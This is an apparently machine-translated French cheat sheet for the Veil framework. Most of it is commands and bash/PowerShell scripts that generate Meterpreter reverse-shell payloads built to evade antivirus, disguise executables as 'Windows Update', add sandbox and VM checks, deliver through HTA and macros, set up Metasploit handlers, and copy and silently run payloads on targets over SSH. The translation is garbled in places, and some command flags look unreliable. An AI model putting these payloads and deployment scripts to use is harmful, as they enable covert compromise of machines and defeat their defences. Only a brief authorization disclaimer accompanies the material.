Cheat veil Feuille
Aperçu général
Veil est un outil conçu pour générer des charges utiles de métasploit qui contournent les solutions anti-virus communes. Il fait partie du Veil-Framework et se concentre sur la génération de charge utile et l'encodage pour échapper à la détection par les logiciels antivirus et les systèmes de protection des terminaux. Veil prend en charge plusieurs langages de programmation et techniques d'encodage pour créer des charges utiles indétectables pour les tests de pénétration et les opérations de l'équipe rouge.
C'est pas vrai. Attention: N'utilisez Veil que dans les environnements que vous possédez ou avez la permission explicite de tester. Une utilisation non autorisée peut violer les conditions de service ou les lois locales. Cet outil est destiné à des fins de tests de sécurité légitimes seulement.
Installation
Installation automatisée
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
Installation manuelle
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
```_
### Installation Docker
```bash
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
```_
### Installation de Kali Linux
```bash
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pull
Utilisation de base
Mode interactif
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)
Mode ligne de commande
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options
Génération de charge utile
Python Charges utiles
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
C# Charges utiles
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444
Charges utiles PowerShell
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444
Aller Charges utiles
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"
Techniques avancées d'évacuation
Encodage et obstruction
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"
Techniques anti-analyse
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check
Options de charge utile personnalisée
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service
Livraison des charges utiles Méthodes
Génération exécutable
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1
Ordre de livraison
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
Intégration avec Metasploit
Configuration des mains
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
Scripts des ressources
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
Scripts d'automatisation
Génération de la charge utile par lots
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
Script de test de charge utile
#!/bin/bash
# Test generated payloads against antivirus
PAYLOAD_DIR="$1"
VIRUSTOTAL_API_KEY="your_api_key_here"
if [ -z "$PAYLOAD_DIR" ]; then
echo "Usage: $0 <payload_directory>"
exit 1
fi
if [ ! -d "$PAYLOAD_DIR" ]; then
echo "Error: Directory not found: $PAYLOAD_DIR"
exit 1
fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
# Function to upload to VirusTotal
upload_to_vt() \\\\{
local file="$1"
local filename=$(basename "$file")
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi
\\\\}
# Function to check scan results
check_vt_results() \\\\{
local scan_id="$1"
local filename="$2"
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi
\\\\}
# Upload all executables
echo "[+] Uploading payloads..."
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
upload_to_vt "$file"
sleep 15 # Rate limiting
fi
done
echo "[+] Waiting for scans to complete..."
sleep 300 # Wait 5 minutes
# Check results
if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then
echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
echo "[-] No scans to check"
fi
Scénario de déploiement de la charge utile
#!/bin/bash
# Deploy Veil payloads for testing
PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0 <payload_directory> <target_host> <target_user>"
exit 1
fi
echo "[+] Deploying payloads to $TARGET_HOST"
# Create remote directory
ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"
# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
filename=$(basename "$file")
echo "[+] Copying $filename..."
scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
if [ $? -eq 0 ]; then
echo " ✓ Copied successfully"
else
echo " ✗ Copy failed"
fi
fi
done
# Create execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to execute payloads
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\\\{
$payload = $_.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
try \\\\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}
Start-Sleep -Seconds 5
\\\\}
EOF
# Copy execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
echo "[+] Deployment completed"
echo "[+] To execute payloads on target:"
echo " ssh $TARGET_USER@$TARGET_HOST"
echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"
rm /tmp/execute_payloads.ps1
Essais d'évacuation
Tests antivirus
# Test against Windows Defender
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
# Test against multiple AV engines
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
# Generate report
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
# Custom AV testing
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
Évasion de la boîte à sable
# Generate payload with sandbox evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--sandbox-evasion \
--sleep 60 \
--vm-check \
--debug-check
# Time-based evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--time-check \
--execution-delay 300
# Environment checks
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--domain-check \
--process-check \
--file-check
Dépannage
Questions communes
Problèmes d'installation
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip
# Fix Wine issues (for Windows compilation)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
# Reinstall Veil
cd Veil
sudo ./config/setup.sh --force
Erreurs de compilation
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
Questions relatives à la charge utile
# Test payload generation
./Veil.py -t Evasion --list-payloads|grep meterpreter
# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
# Test payload execution
wine /var/lib/veil/output/compiled/payload.exe
Débogue et exploitation forestière
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
# Check Veil logs
tail -f /var/lib/veil/output/veil.log
# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
# Check compilation output
cat /var/lib/veil/output/source/payload.cs
Ressources
- [Cadre officiel des véhicules] (LINK_7)
- [Documentation de conseil] (LINK_7)
- [Cadre de déploiement] (LINK_7)
- [Techniques d'évacuation antivirus] (LINK_7)
- Pratiques exemplaires de la génération de charges utiles
- [Format Windows PE] (LINK_7)
- [Techniques d'obfusation du code] (LINK_7)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Veil pour la génération de charge utile et l'évasion antivirus. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *